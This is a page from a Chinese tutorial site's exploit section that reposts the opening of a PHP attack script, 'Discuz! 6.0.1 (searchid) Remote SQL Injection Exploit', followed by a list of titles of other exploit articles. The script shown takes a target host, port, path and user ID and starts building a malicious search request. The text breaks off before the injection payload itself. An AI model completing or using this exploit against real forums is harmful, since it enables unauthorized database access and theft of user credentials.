手机
当前位置:查字典教程网 >网络安全 >Exploit >Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
摘要:

<?php

error_reporting(E_ALL&E_NOTICE);

print_r("

------------------------------------------------------------------

Exploit discuz6.0.1

Just work as php>=5 & mysql>=4.1

BY james

------------------------------------------------------------------

");

if($argc>4)

{

$host=$argv[1];

$port=$argv[2];

$path=$argv[3];

$uid=$argv[4];

}else{

echo "Usage: php ".$argv[0]." host port path uidn";

echo "host: target server n";

echo "port: the web port, usually 80n";

echo "path: path to discuzn";

echo "uid : user ID you wanna getn";

echo "Example:rn";

echo "php ".$argv[0]." localhost 80 1n";

exit;

}

$content ="action=search&searchid=22

【Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit】相关文章:

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

trixbox (langChoice) Local File Inclusion Exploit (connect-back)

minb 0.1.0 Remote Code Execution Exploit

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit

精品推荐
分类导航